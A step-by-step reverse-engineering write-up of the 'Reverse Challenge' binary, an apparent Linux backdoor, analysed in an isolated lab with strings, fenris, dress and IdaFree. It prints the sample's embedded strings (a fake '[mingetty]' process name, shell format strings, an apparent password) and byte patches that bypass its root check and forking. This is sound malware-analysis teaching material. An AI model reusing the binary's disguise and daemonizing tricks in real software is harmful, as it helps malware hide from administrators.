In this document we’re going to go through the process of reverse engineering an application. The goal of the document is to provide the answers to “The Reverse Challenge” as well as to learn the basics of reverse-engineering along the way.
The first step is to ensure that we have downloaded “the-binary” provided for the challenge correctly and without alteration by running md5 (R*) on it.
[albert@sandbox reverse-ch]$ md5sum the-binary.tar.gz
857f9f32cbe7a277710d4fa57670316a the-binary.tar.gz
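The same check can be scripted. The following is a minimal sketch, assuming Python is available on the analysis box; the function names are hypothetical helpers and not part of the challenge material.

```python
import hashlib


def md5_of_file(path, chunk_size=65536):
    """Return the hex MD5 digest of the file at `path`, reading it in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_published_digest(path, expected_hex):
    """Compare the computed digest with a published one, ignoring case and whitespace."""
    return md5_of_file(path) == expected_hex.strip().lower()
```

Calling matches_published_digest("the-binary.tar.gz", "857f9f32cbe7a277710d4fa57670316a") should return True for an unaltered download.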
After this we’re ready to unpack the file:
[albert@sandbox reverse-ch]$ tar -xzvf the-binary.tar.gz
reverse/
reverse/README.html
reverse/the-binary
To have an idea of what we’re dealing with we check the kind of file:
[albert@sandbox reverse]$ file the-binary
the-binary: ELF 32-bit LSB executable, Intel 80386, version 1, statically linked, stripped
As expected from this kind of file it’s stripped, but it’s interesting to note that it’s statically linked, which means that it carries all the library functions it uses inside. This could have been done for the following reasons:
To avoid including the information needed to link with dynamic libraries (information that would make it easier to trace calls and reverse-engineer the application).
To avoid possible problems in case the binary is run on a system without the required libraries.
To make reverse-engineering more difficult by having all the library functions and the application’s own functions in a single binary.
As it is an ELF binary, we can try to get more information through “objdump”. The new information we get is this:
[albert@sandbox the-binary]$ objdump -x the-binary

the-binary:     file format elf32-i386
the-binary
architecture: i386, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x08048090

Program Header:
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x00024222 memsz 0x00024222 flags r-x
    LOAD off    0x00024228 vaddr 0x0806d228 paddr 0x0806d228 align 2**12
         filesz 0x0000c094 memsz 0x00011970 flags rw-

Sections:
Idx Name           Size      VMA       LMA       File off  Algn
  0 .init          00000008  08048080  08048080  00000080  2**4
                   CONTENTS, ALLOC, LOAD, READONLY, CODE
  1 .text          0001f53c  08048090  08048090  00000090  2**4
                   CONTENTS, ALLOC, LOAD, READONLY, CODE
  2 __libc_subinit 00000004  080675cc  080675cc  0001f5cc  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .fini          00000008  080675d0  080675d0  0001f5d0  2**4
                   CONTENTS, ALLOC, LOAD, READONLY, CODE
  4 .rodata        00004c4a  080675d8  080675d8  0001f5d8  2**2
                   CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .data          0000c084  0806d228  0806d228  00024228  2**2
                   CONTENTS, ALLOC, LOAD, DATA
  6 .ctors         00000008  080792ac  080792ac  000302ac  2**2
                   CONTENTS, ALLOC, LOAD, DATA
  7 .dtors         00000008  080792b4  080792b4  000302b4  2**2
                   CONTENTS, ALLOC, LOAD, DATA
  8 .bss           000058dc  080792bc  080792bc  000302bc  2**2
                   ALLOC
  9 .note          00000d5c  00000000  00000000  000302bc  2**0
                   CONTENTS, READONLY
 10 .comment       00000ea6  00000000  00000000  00031018  2**0
                   CONTENTS, READONLY
objdump: the-binary: no symbols
The most interesting part is that we have a “__libc_subinit” section, which means that we have a “libc” linked in.
Next, we take a look inside the binary with “strings”:
[albert@sandbox reverse]$ strings the-binary
We get a long set of strings. Looking around we find the following interesting entries.
First group:
[mingetty]
/tmp/.hj237349
/bin/csh -f -c "%s" 1> %s 2>&1
TfOjG
/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.
PATH
HISTFILE
linux
TERM
/bin/sh
/bin/csh -f -c "%s"
All these entries seem quite interesting. First comes what looks like a faked “process name” for “ps”, next a temporary file name, a format string to execute one command redirecting standard output and error, what looks like a password (TfOjG), environment variables for a shell, a shell invocation command and another format string to execute one command, but this time without redirection. These look as if they could be the constants of the application.
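To make clear what “strings” is doing for us, here is a minimal sketch of the same idea: scan the raw bytes for runs of printable characters. It assumes printable ASCII plus tab and a minimum run length of 4; the function name is hypothetical, and the real tool has more options than this.

```python
import re


def printable_strings(data, min_len=4):
    """Yield runs of at least `min_len` printable ASCII characters found in `data`."""
    # 0x20-0x7e is the printable ASCII range; tab is accepted as well.
    pattern = re.compile(rb"[\x20-\x7e\t]{%d,}" % min_len)
    for match in pattern.finditer(data):
        yield match.group().decode("ascii")
```

Reading “the-binary” in binary mode and passing its contents to printable_strings() should produce a list comparable to the one we have been looking at.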
Second group:
The second group comes immediately after the first, and also seems to be a group of constants. Some of them as a sample:
RESOLV_SERV_ORDER
RESOLV_SPOOF_CHECK
warn
warn off
RESOLV_MULTI
RESOLV_REORDER
RESOLV_ADD_TRIM_DOMAINS
RESOLV_OVERRIDE_TRIM_DOMAINS
gethostby*.getanswer: asked for "%s", got CNAME for "%s"
gethostby*.getanswer: asked for type %d(%s), got %d(%s)
They seem to be DNS related, so perhaps the resolv library is linked, but a “strings” on our resolv library doesn’t seem to match. We check with;
[albert@sandbox reverse]$ strings /usr/lib/libresolv.a| grep RESOLV_OVERRIDE_TRIM_DOMAINS
[albert@sandbox reverse]$
No output, so it really seems that we missed this one. We’ll try to find which library it belongs to:
[albert@sandbox reverse]$ find /usr/lib -name "*.a" -exec grep RESOLV_OVERRIDE_TRIM_DOMAINS {} \;
Binary file /usr/lib/libc.a matches
[albert@sandbox reverse]$
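The same search can be written as a small script, which is handy when several strings have to be checked against several library directories. This is only a sketch of the find/grep combination above; the function name and its parameters are hypothetical.

```python
import os


def archives_containing(root, needle, suffix=".a"):
    """Return the sorted paths under `root` ending in `suffix` whose bytes contain `needle`."""
    hits = []
    for directory, _subdirs, files in os.walk(root):
        for name in files:
            if not name.endswith(suffix):
                continue
            path = os.path.join(directory, name)
            try:
                with open(path, "rb") as handle:
                    if needle in handle.read():
                        hits.append(path)
            except OSError:
                continue  # unreadable file: skip it and keep searching
    return sorted(hits)
```

For example, archives_containing("/usr/lib", b"RESOLV_OVERRIDE_TRIM_DOMAINS") would be the equivalent of the command shown.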
So it seems we found the library it belongs to: “libc”. On the other hand it was normal to expect this library to be there, as it is the most basic one and we had already spotted it with “objdump”.
Third group:
This seemed to be another group at first, as there was quite a lot of “garbage” and the next string found was not related to DNS, but after the analysis of the second group, we see that the string “@(#) The Linux C library 5.3.12” clearly defines what “libc” version we’re dealing with.
A little research through “rpmfind.net” allows us to see that this library is the one distributed by default with “RedHat 6.2”. So perhaps “the-binary” was compiled on this platform.
This also gives us a hint about the process we’re following. We’re looking for strings in a different library (we’re using RedHat 7.1, which has a “libc6” library), so it is possible that some strings don’t match. To avoid this we download the sources for “The Linux C library 5.3.12” and search for the strings there.
While still checking strings we come across a really special one:
*nazgul*
Nazgul is the name of a kind of “Dark Spirit” in the novel “The Lord of the Rings”. An appropriate name for a hacking tool. But doing our check on the LibC sources
[albert@sandbox albert]$ grep -Hr \*nazgul\* /usr/src/redhat/SOURCES/libc/*
/usr/src/redhat/SOURCES/libc/nls/msgcat.h:#define MCMagic "*nazgul*"
/usr/src/redhat/SOURCES/libc/nls/msgcat.h: char magic[MCMagicLen]; /* Magic cookie "*nazgul*" */
[albert@sandbox albert]$
we find out (surprisingly) that it’s part of it! That reminds us of something: always check your assumptions. They can be wrong!
We keep looking and don’t notice anything suspicious or that doesn’t match our LibC 5.3.12 source files. So our research through “strings” is done.
Our next step will be to start with the disassembly and execution of the application, but for that we have to set up a proper environment. The binary we want to execute could be malicious.
It would be good to set up an environment with VMWare as described in (R*), but we don’t have a VMWare license. So we’ll go with what we have: 2 PCs. On one of them we run Win98, on the other RedHat Linux 7.1 (6.2 would have been better, as it is the one that comes with LibC 5.3.12, or 7.3, the most current, but we only have 7.1 at hand).
We connect them with a crossover Ethernet cable and configure them on a private network: the Linux box with IP 192.168.1.1 and the Win98 box with IP 192.168.1.7.
On the Win98 box we install;
On the Linux box we install;
Tripwire to check the system integrity after executions of “the-binary”
Fenris to trace “the-binary” activity
Gdb to do reverse-engineering and controlled tracing of “the-binary”
We configure the Linux box so that it sends ALL the network traffic to the Win98 box. We do this by configuring two things:
The default route for the Linux box goes to the Win98 one
We tell the Linux box to use DNS services on our Win98 box (even though we don't have a DNS server there!)
We will try to execute the application as a non-privileged user, as we don't
know what kind of action this application can take. So we create a user for
running this application and we'll check with Tripwire from time to time to
ensure that our system hasn't been affected in any way.
Our first run of "the-binary" will be with fenris so we can see what happens. The fenris distribution we use initially comes with a set of signatures from a "libc5" library. That will come in handy to analyze our binary, as the system we use has a "libc6" library but, as we've seen, "the-binary" comes with a "libc5" library.
Before running "the-binary" we start our sniffer on the Win98 box. Then we go with our first run of "the-binary":
[tstusr@sandbox reverse]$ ../fenris/fenris ./the-binary
fenris 0.04b (2699, 22396) - program execution path analysis tool
Brought to you by Michal Zalewski <lcamtuf@coredump.cx>
* WARNING: cannot load 'fnprints.dat' fingerprints database.
+++ Executing './the-binary' (pid 25725, static) +++
25725:-- SYS exit (-1) = ???
+++ Process 25725 exited with code 255 +++
************************************************************
* Hmm, call me suspicious. I tried to skip libc prolog for *
* this application, but it seems to me I skipped way too   *
* much. Maybe this program is too smart for me? Maybe it   *
* was compiled in some exotic place? Consider using -s     *
* option for now, and contact my author!                   *
************************************************************
>> Exit condition: no more processes to trace
OK, so we do as the application suggests and use "-s", which according to the documentation "disables automatic prolog detection" and therefore traces all the libc initialization. We have no problem with that. So here we go:
[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat ./the-binary
fenris 0.02b (2334, 22396) - program execution path analysis tool
Brought to you by Michal Zalewski <lcamtuf@coredump.cx>
- <CONTINUES, Snipped for brevity>
We get a not-so-long output that we inspect visually. It seems that the application has exited. Before looking through the output we check our sniffer and see no relevant activity. We also ensure with "tripwire" that everything is OK. Then we take a look through the output and we see the following;
14719:01 local fnct_8 ()
14719:01 + fnct_8 = 0x8048134
14719:01 # No matches for signature CD18AE48.
14719:02 local fnct_9 (0, 0, 0)
14719:02 + fnct_9 = 0x805720c
14719:02 # Matches for signature 5527EA2B: geteuid libc_geteuid
14719:03 SYS geteuid () = 503
14719:03 <805721a> cndt: if-above block (signed) +16 executed
14719:02 ...return from function = <void>
14719:02 <8048182> cndt: conditional block +8 executed
14719:02 local fnct_10 (-1)
14719:02 + fnct_10 = 0x8055fbc
14719:02 # No matches for signature 09B18AA8.
There's a call to a "local fnct_10 (-1)"; this seems to be the "beginning of the end", as a "-1" value usually means an error. We see that the previous call was a call to "geteuid" that returned 503, the UID of tstusr. So it seems that if "the-binary" is not run by root it detects it and stops execution.
We could run it as root, but that's not advisable at all as we still don't know much about the functionality of "the-binary". So the other solution is to patch the program so we can skip this check.
To do that we need to disassemble "the-binary" and look where to modify the code. For that purpose we disassemble "the-binary" with IdaFree.
Once in IdaFree we load "the-binary" which we have first copied into a directory on the Win98 box.
This gives us a nice disassembly of "the-binary". In the previous execution of fenris we've seen that the call to geteuid (fnct_9) was made from "fnct_8", which starts at position 0x8048134, so we go to the routine at that position and look for a call to the routine at position 0x805720c (fnct_9). We find it easily. The code is:
.text:0804816B mov [ebp+var_44D8], edx
.text:08048171 mov [ebp+var_44C4], 10h
.text:0804817B call sub_0_805720C
.text:08048180 test eax, eax
.text:08048182 jz short loc_0_804818C
.text:08048184 push 0FFFFFFFFh
.text:08048186 call sub_0_8055FBC
.text:0804818B nop
Using the information we got from our fenris execution we can make this more readable by using IdaFree to rename the functions we have identified so far. These are sub_0_805720C, which fenris matched as "geteuid", and sub_0_8055FBC, which we name "error_exit".
After renaming these 2 functions we get:
.text:0804816B mov [ebp+var_44D8], edx
.text:08048171 mov [ebp+var_44C4], 10h
.text:0804817B call geteuid
.text:08048180 test eax, eax
.text:08048182 jz short loc_0_804818C
.text:08048184 push 0FFFFFFFFh
.text:08048186 call error_exit
.text:0804818B nop
That's more understandable than before. Now we can see that the "jz short loc_0_804818C" jump is taken for root. We can just turn that around by changing the "jz" into a "jnz". Looking at the Intel reference we find that we have to replace the value 0x74 at position 0x08048182 (opcode for a "jz") with 0x75 (opcode for a "jnz").
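The 0x74/0x75 pair is not a coincidence. On x86 the short conditional jumps occupy opcodes 0x70 to 0x7F, and each condition and its negation differ only in the lowest bit. A small sketch of that rule follows; the function name is a hypothetical helper, and it deliberately handles only the one-byte short form seen here.

```python
JZ = 0x74   # jump if zero (equal)
JNZ = 0x75  # jump if not zero (not equal)


def invert_short_jcc(opcode):
    """Return the opcode of the short conditional jump with the opposite condition."""
    if not 0x70 <= opcode <= 0x7F:
        raise ValueError("not a short conditional jump opcode: %#x" % opcode)
    # Opposite conditions are encoded as consecutive even/odd opcodes.
    return opcode ^ 0x01
```

The jump displacement that follows the opcode is left untouched, so only one byte has to change in the file.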
So now that we know what we want to achieve it's time to patch "the-binary".
We could use the "-P" option of fenris to patch "on-the-fly" the binary. That would be;
[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat -P 0x8048182:0x75 ./the-binary
But later on we will also want to inspect it with "gdb". There the way to patch it is the "set" command, writing a single byte so that the bytes following the opcode are left untouched:
gdb> set {char}0x8048182 = 0x75
It's also foreseeable that we will end up with more patches than this one, so it's better to have a patched binary. Looking around we find that xxd (part of the vim package) has the ability to patch binaries in a convenient way. First we have to find out which position in the binary file ends up at address 0x8048182 in memory.
We can check this visually using IdaFree and its "Options\ Dump/Normal view" or by pressing F4. This gives us a dump so we can see where our "0x74" is. With xxd we obtain a pretty much identical kind of dump and we can easily spot the point by comparing visually. We have to modify the byte at position 0000182. That gives us the path to follow in further modifications: we have to subtract 0x8048000 from the memory location to get the file offset to modify. This matches the first LOAD segment reported by objdump, which maps file offset 0 to address 0x08048000, so the rule holds for addresses inside that segment.
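The subtraction can be generalized using the two LOAD segments that "objdump -x" reported earlier. The sketch below is an illustration only; the table is copied from that output and the function name is hypothetical.

```python
# LOAD segments from the "objdump -x" output: (file offset, vaddr, filesz).
LOAD_SEGMENTS = [
    (0x00000000, 0x08048000, 0x00024222),  # r-x: code and read-only data
    (0x00024228, 0x0806D228, 0x0000C094),  # rw-: initialized data
]


def vaddr_to_file_offset(vaddr, segments=LOAD_SEGMENTS):
    """Translate a memory address into an offset in the file on disk."""
    for file_off, seg_vaddr, filesz in segments:
        if seg_vaddr <= vaddr < seg_vaddr + filesz:
            return file_off + (vaddr - seg_vaddr)
    raise ValueError("address %#x is not backed by file contents" % vaddr)
```

For the code segment this reduces to "subtract 0x8048000", which is the rule we use for all our patches. Addresses in the data segment need a different constant, and addresses in .bss have no file offset at all.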
So we prepare a patched binary with the following commands;
[tstusr@sandbox reverse]$ cp the-binary the-binary-NOROOT
[tstusr@sandbox reverse]$ echo '0000182: 75' | xxd -r - the-binary-NOROOT
Now we have a clear way to patch "the-binary". Because we will apply more than one patch and we might try to patch different parts, we can set up a simple script that patches all the parts. So we write a script as;
#!/bin/sh
if [ "$1" = "" ] ; then
  echo "Output filename missing";
  exit 1;
fi
cp the-binary-dressed "$1"
# Run without being root
echo '0000182: 75' | xxd -r - "$1"
A complete script with all "developed" patches is given in the extra files that come with this analysis.
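For readers without xxd at hand, the same "copy, then overwrite bytes in place" idea can be sketched in a few lines. This is not the script used in the analysis; the function name and the patch list format are assumptions made for the example.

```python
import shutil


def apply_patches(source, target, patches):
    """Copy `source` to `target`, then overwrite bytes at each (offset, data) pair."""
    shutil.copyfile(source, target)
    with open(target, "r+b") as handle:  # "r+b" updates in place without truncating
        for offset, data in patches:
            handle.seek(offset)
            handle.write(data)


# The single patch developed so far: turn the "jz" after geteuid() into a "jnz".
NOROOT_PATCHES = [(0x182, bytes([0x75]))]
```

A call such as apply_patches("the-binary", "the-binary-NOROOT", NOROOT_PATCHES) would then leave the original file untouched and produce the patched copy.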
Our goal is to check the activity that "the-binary" produces. For that we keep using fenris to try to find out. That will bring us to a cycle of
So we're going to discuss the problems found and how to get around them without the detail of how to perform each step.
The next execution of fenris
[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat ./the-binary-NOROOT
generates a longer output where we find;
14836:02 local fnct_13 ()
14836:02 + fnct_13 = 0x80571e8
14836:02 # Matches for signature BCF79788: fork libc_fork vfork
14836:03 SYS fork () = 14837
14836:-- SIGNAL 17 (Child exited) - will not be handled
14836:03 <80571f6> cndt: if-above block (signed) +16 executed
14836:02 ...return from function = <void>
14836:02 <80481df> cndt: conditional block +7 executed
14836:02 local fnct_14 (0)
14836:02 + fnct_14 = 0x8055fbc
14836:02 # No matches for signature 09B18AA8.
So there's a fork(), and looking on how things go, we see that the application calls the function at 0x8055fbc which we know is the one that we named "error_exit" before.
So it seems that the "interesting" work gets done by the child process of the fork().
Looking at the fenris documentation (README file) we see that we have an option to trace child processes; "-f". So we try again;
[tstusr@sandbox reverse]$ ../fenris/fenris -f -s -L ../fenris/support/fn-libc5.dat ./the-binary-NOROOT
with the following outcome;
14850:03 fork () = 14851
>> OS error : Operation not permitted [1]
>> Error condition: PTRACE_ATTACH failed
>> This condition occoured while tracing pid 14850 (eip 80571f0).
>> Traced 293 user CPU cycles (0 libcalls, 13 fncalls, 4 syscalls).
**************************************************
* If you believe this is because of programming  *
* error, please report above message, along with *
* information about your working environment and *
* traced application, to the author of this      *
* utility (e-mail: lcamtuf@coredump.cx). Thanks! *
**************************************************
Again, no luck. As the documentation states, "-f" might have some problems, and they're affecting us.
So we take another approach; if we want to follow the child process, just change the code that makes it jump one way or another. In this case we have to change another "jz" for another "jnz" at position 0x080481df.
We apply the patch and try again.
We get the same outcome, with another fork() call. So we repeat our process and move on. This leads to a file patched with:
#!/bin/sh
if [ "$1" = "" ] ; then
  echo "Output filename missing";
  exit 1;
fi
cp the-binary "$1"
# Run without being root
echo '0000182: 75' | xxd -r - "$1"
# Switch behaviour of parent and child on first fork
echo '00001DF: 75' | xxd -r - "$1"
# Switch behaviour of parent and child on second fork
echo '0000200: 75' | xxd -r - "$1"
When we run the patched binary again with fenris we get a large amount of output, so we had better use the "-o" option of fenris to write all this output to a file.
[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat -o fenris.out \
> ./the-binary-NOROOT-NOFORK1-NOFORK2
Fenris doesn't stop, so we stop it after about 10 seconds of execution.
Problem with "socket" and "socketcall_10"
Looking through fenris.out becomes a hard task but we can still find some things. We can see a lot of repetition in what seem to be two different loops. But looking between the two main "repetition groups" we find the following:
14897:02 local fnct_20 (2, 3, 11)
14897:02 + fnct_20 = 0x8056cf4
14897:02 # No matches for signature 93D3112B.
14897:03 SYS socket (PF_INET, SOCK_RAW, 11 [nvp]) = -1 (Operation not permitted)
14897:03 <8056d22> cndt: if-above block (signed) +13 executed
14897:02 ...return from function = <void>
14897:02 // function has accessed non-local memory:
So it seems that "the-binary" is trying to open a RAW socket. It obviously can't because only root can do that. Later, in the second "repetition" group, we see a lot of:
14897:02 local fnct_21 (-1, l/bffff334, 2048, 0)
14897:02 + l/bffff334 (maxsize 2060) = stack of fcnt_8 (0 down)
14897:02 # No matches for signature 16E2ECD3.
14897:03 SYS socketcall_10 (0xbfffb610 <invalid>) = -9 (Bad file descriptor)
14897:03 <8056b78> cndt: if-above block (signed) +13 executed
So it seems that we're trying to do some kind of socketcall with a bad file descriptor. Probably the one we haven't been able to open on the previous "socket" operation.
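The "socketcall_10" name deserves a note. On i386 Linux the socket functions go through a single multiplexed system call, socketcall, whose first argument selects the operation. The table below lists the sub-call numbers as defined in the kernel's <linux/net.h>; the lookup function is a hypothetical helper for reading traces.

```python
# Sub-call numbers of the Linux socketcall() multiplexer, from <linux/net.h>.
SOCKETCALL_NAMES = {
    1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept",
    6: "getsockname", 7: "getpeername", 8: "socketpair", 9: "send",
    10: "recv", 11: "sendto", 12: "recvfrom", 13: "shutdown",
    14: "setsockopt", 15: "getsockopt", 16: "sendmsg", 17: "recvmsg",
}


def socketcall_name(number):
    """Return the socket function selected by a socketcall sub-call number."""
    return SOCKETCALL_NAMES.get(number, "unknown(%d)" % number)
```

So sub-call 10 would be a "recv" on the descriptor that the failed "socket" call returned (-1), which fits the "Bad file descriptor" error.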
It's quite obvious that moving through this output would be too hard, so it's time to do some analysis on the disassembly of "the-binary".
We can see that IdaFree has identified a large number of functions. We can be pretty sure that most of them are library functions, but which?
Obviously it would be nice to recognize as many of the library functions as possible. We have several ways to achieve this: FLIRT signatures, the "dress" tool that comes with fenris, and manual recognition of the system calls made through "INT 80h".
Without doubt the first two options are the most appropriate (FLIRT or Dress, both signature based). But the third one also comes in handy to reinforce the output generated by these options (at least dress, as we haven't tried FLIRT).
The reason for the reinforcement comes from the fact that several functions have identical signatures, for example getsockopt and setsockopt. Dress can't tell which one is which. With our third option (manual recognition of "INT 80h" calls) we can clearly tell one from the other.
So as our next step we "dress" "the-binary".
[tstusr@sandbox reverse]$ ../fenris/dress -F ../fenris/support/fn-libc5.dat the-binary the-binary-dressed
dress - stripped static binary recovery tool by <lcamtuf@coredump.cx>
* WARNING: cannot load 'fnprints.dat' fingerprints database.
[+] Loaded 5400 fingerprints...
[*] Code section at 0x08048090 - 0x080675cc, offset 144 in the file.
[*] For your initial breakpoint, use *0x8048090
[+] Locating CALLs... 371 found.
[+] Matching fingerprints...
[*] Writing new ELF file:
[+] Cloning general ELF data...
[+] Setting up sections: .init .text .fini .rodata .data .ctors .dtors .bss .note .comment
[+] Preparing new symbol tables...
[+] Copying all sections: .init .text .fini .rodata .data .ctors .dtors .bss .note .comment
[+] All set. Detected fingerprints for 209 of 371 functions.
(Note: the WARNING message is because we're not executing dress from the fenris directory or providing the path to fnprints.dat, but that's not a problem since we only want the fingerprints of the functions on libc5 to be used).
Now we take "the-binary-dressed" to IDA and watch the new output. That looks completely different than before!
If we look at the list of functions (menu "View/Functions") we'll see that we got a lot of the library functions identified. Even then, we still have some confusion with "recvfrom___sendto" and "recvfrom___sendto_0" among others. If we need to clarify any of these confusions we can try with the third method described before. In the specific case of the "recvfrom___sendto" and "recvfrom___sendto_0" it resolves the doubt immediately.
But the third method also comes in handy to identify some functions not identified by dress, like for example;
and some others (less useful) like "wait4" and "brk".
So the third method proves to be really useful for reaching some points where the "fingerprint recognizers" fail.
Now we're ready to navigate through the code more easily and try to understand what happens.
We have seen that the places where we've had to patch the binary so far were in the same function. So we'll start by looking at this function.
Here we have to be really patient and persistent to start getting all the information out of the disassembly. This is quite an intuitive task, but we can make progress with some "semi-automatic" recognition of variables (both global and local).
To do that we will rename some variables so we can tell what type they are. We'll look at the library calls, look at the types of their parameters and then name the variables pushed on the stack accordingly. For that we'll sometimes have to track the assignment of registers that are pushed on the stack but were assigned a value long before.
We can also see, especially at the beginning of this function, that some variables are used to point to others, so we know they will be pointers.
Another thing we can do to "organize" the variables is to define structures for the things we recognize.
We'll take as an example the first call to "recv" at position ".text:080482C5" (in fact it's not a random example, as we get quite a lot of information from this one).
Initially we have:
push 0
push 800h
lea eax, [ebp+var_800]
push eax
mov ecx, [ebp+var_44C8]
push ecx
call recv
mov esi, eax
This translates to "C" as;
"register esi" = recv ( var_44C8, &var_800, 800h, 0);
We see in the libc5 sources that "recv" has the following prototype:
int recv (int __sockfd, void *__buff, size_t __len, unsigned int __flags);
So now we know that var_44C8 is a socket file descriptor and that var_800 is an array at least 2048 (800h) bytes long.
But we can push it even further. We know that this "recv" call will receive an IP packet in its buffer, so we know what structure the "var_800" buffer will hold!
So we define this structure (basically) by using IdaFree's structure definition interface.
We go to "View/Structure" and insert the following structures;
0000 iphdr struc ; (sizeof=0x14)
0000 ihl_version db ?
0001 TOS db ?
0002 len dw ?
0004 id dw ?
0006 frag_off dw ?
0008 TTL db ?
0009 protocol db ?
000A crc dw ?
000C saddr dd ?
0010 daddr dd ?
0014 iphdr ends
0014
0000 ; -------------------------------------
0000
0000 rawIPpacket struc ; (sizeof=0x800)
0000 hdr iphdr ?
0014 data db 2028 dup(?)
0800 rawIPpacket ends
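To see the same layout from outside IDA, here is a minimal sketch that splits a received buffer using the field names of the "iphdr" structure above. It assumes a fixed 20-byte header without IP options, as the structure does, and network byte order for the multi-byte fields; the function name is hypothetical.

```python
import struct

# Same layout as the "iphdr" structure: 20 bytes, network byte order, no padding.
IPHDR = struct.Struct("!BBHHHBBHII")
IPHDR_FIELDS = ("ihl_version", "TOS", "len", "id", "frag_off",
                "TTL", "protocol", "crc", "saddr", "daddr")


def split_raw_ip_packet(buf):
    """Return (header dict, payload bytes) for a buffer laid out like rawIPpacket."""
    if len(buf) < IPHDR.size:
        raise ValueError("buffer shorter than an IP header")
    header = dict(zip(IPHDR_FIELDS, IPHDR.unpack_from(buf)))
    return header, buf[IPHDR.size:]
```

With this, header["protocol"] is the byte at offset 09h and the first payload byte is the one at offset 14h, the same offsets IDA shows for "protocol" and "data".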
Then we go to where the "var_800" variable is defined (the fastest way is to place the cursor on a use of "var_800" in the code we're looking at and hit enter) and define it as having the structure "rawIPpacket". For IdaFree to allow this we first have to undefine (with the "u" key) all the variables from var_7FF to var_7EA; then we can go to "var_800", select "Edit/Struct/Declare struct var..." and select our "rawIPpacket" structure.
After recognizing more variables this way, we get quite a change on our variable names;
From this:
var_44F0 = dword ptr -44F0h
var_44EC = dword ptr -44ECh
var_44E8 = dword ptr -44E8h
var_44E4 = dword ptr -44E4h
var_44E0 = dword ptr -44E0h
var_44DC = dword ptr -44DCh
var_44D8 = dword ptr -44D8h
var_44D4 = dword ptr -44D4h
var_44D0 = dword ptr -44D0h
var_44CC = dword ptr -44CCh
var_44C8 = dword ptr -44C8h
var_44C4 = dword ptr -44C4h
var_44C0 = dword ptr -44C0h
var_44BC = byte ptr -44BCh
var_43BC = byte ptr -43BCh
var_11D8 = byte ptr -11D8h
var_11C8 = word ptr -11C8h
var_11C6 = word ptr -11C6h
var_11C4 = dword ptr -11C4h
var_11B8 = byte ptr -11B8h
var_1190 = byte ptr -1190h
var_1000 = byte ptr -1000h
var_FFF = byte ptr -0FFFh
var_FFE = byte ptr -0FFEh
var_FFD = byte ptr -0FFDh
var_FFC = byte ptr -0FFCh
var_FFB = byte ptr -0FFBh
var_FFA = byte ptr -0FFAh
var_FF9 = byte ptr -0FF9h
var_FF8 = byte ptr -0FF8h
var_FF7 = byte ptr -0FF7h
var_FF6 = byte ptr -0FF6h
var_FF5 = byte ptr -0FF5h
var_FF4 = byte ptr -0FF4h
var_FF3 = byte ptr -0FF3h
var_FF2 = byte ptr -0FF2h
var_800 = byte ptr -800h
var_7FF = byte ptr -7FFh
var_7FE = byte ptr -7FEh
var_7FD = byte ptr -7FDh
var_7FC = byte ptr -7FCh
var_7F0 = byte ptr -7F0h
var_7EF = byte ptr -7EFh
var_7EE = byte ptr -7EEh
var_7ED = byte ptr -7EDh
var_7EC = byte ptr -7ECh
var_7EA = byte ptr -7EAh
arg_4 = dword ptr 0Ch

To this:
var_RandomValue?= dword ptr -44F0h
var_0Value? = dword ptr -44ECh
var_3rdBufferPtr= dword ptr -44E8h
var_AddrPtr = dword ptr -44E4h
var_2ndBufPtr = dword ptr -44E0h
var_tmpFD = dword ptr -44DCh
var_BufDat2Ptr = dword ptr -44D8h
var_BufDatPtr = dword ptr -44D4h
var_BuffPtr = dword ptr -44D0h
var_acceptFD = dword ptr -44CCh
var_mainSD = dword ptr -44C8h
var_AcceptAddrLen= dword ptr -44C4h
var_setsockopt_optval= dword ptr -44C0h
var_Buf256Bytes = byte ptr -44BCh
var_TCPRecvBuf = byte ptr -43BCh
var_AcceptAddr = byte ptr -11D8h
var_bindSockAddr= sockaddr_in ptr -11C8h
var_Addr = byte ptr -11B8h
var_3rdBuffer = byte ptr -1190h
var_2ndBuf = byte ptr -1000h
var_Buf = rawIPpacket ptr -800h
This will enormously simplify the reading of the code.
We can also change some global variable names this way. Here we can count on extra help from IdaFree, which gives us a "view/Cross reference" option to identify where and how every variable is accessed.
Our final result for the uninitialized variables (.bss segment) is:
.bss:0807E770*gPID dd ?
.bss:0807E770*
.bss:0807E774*gPID2 dd ?
.bss:0807E774*
.bss:0807E778*gWord1 dd ?
.bss:0807E778*
.bss:0807E77C gDouble1 dd ?
.bss:0807E780*gbdaddr dd ?
.bss:0807E780*
.bss:0807E784*gWord2_0_or_2 dd ?
which is a big improvement over the initial situation. We also make some sense of the constants (.rodata segment), where we can recognize the "[mingetty]" string we saw in the "strings" analysis.
Overall, we can now start navigating our main function with a lot more clues than initially.
With all the variables set, we're now ready to start looking at the assembly code and try to understand what it does.
The routine starts by preparing the stack, allocating space on it, and saving some registers. Next it initializes some variables and then checks whether it's running as root. If it's not, it exits (position .text:08048186). We have already developed a patch to prevent this.
Next it seems to be doing something strange, but a careful analysis reveals that it overwrites argv[0] (the string by which the program was invoked) with "[mingetty]". Obviously it tries to disguise itself. This also reinforces our idea that this is the "main()" function of the application, as the only parameter accessed corresponds to what we would expect (argv[0]).
After that it forks twice, with a call to setsid() in the middle, allowing only the child to continue execution each time. This turns the application into a daemon. We have also developed a patch to prevent this.
We're now at loc_0_804820C. Here the application does a chdir("/") and closes all the standard file descriptors (input, output and error), which is also a common practice in daemons.
Next it initializes some variables and calls an unknown function with the current time as a parameter, like this:
strange_function ( time() );
We don't know what this function does, and as its result (if it has any) seems to be completely ignored we will leave the function aside for the moment.
The next call is quite obvious and it brings us back to the problem we found with the "socket" call. It is a call like this:
var_mainSD = socket(AF_INET, SOCK_RAW, 0Bh);
Opening raw sockets is only allowed to root, but we still don't know what this binary does, so we'll want to avoid using raw sockets. We'll deal with that shortly.
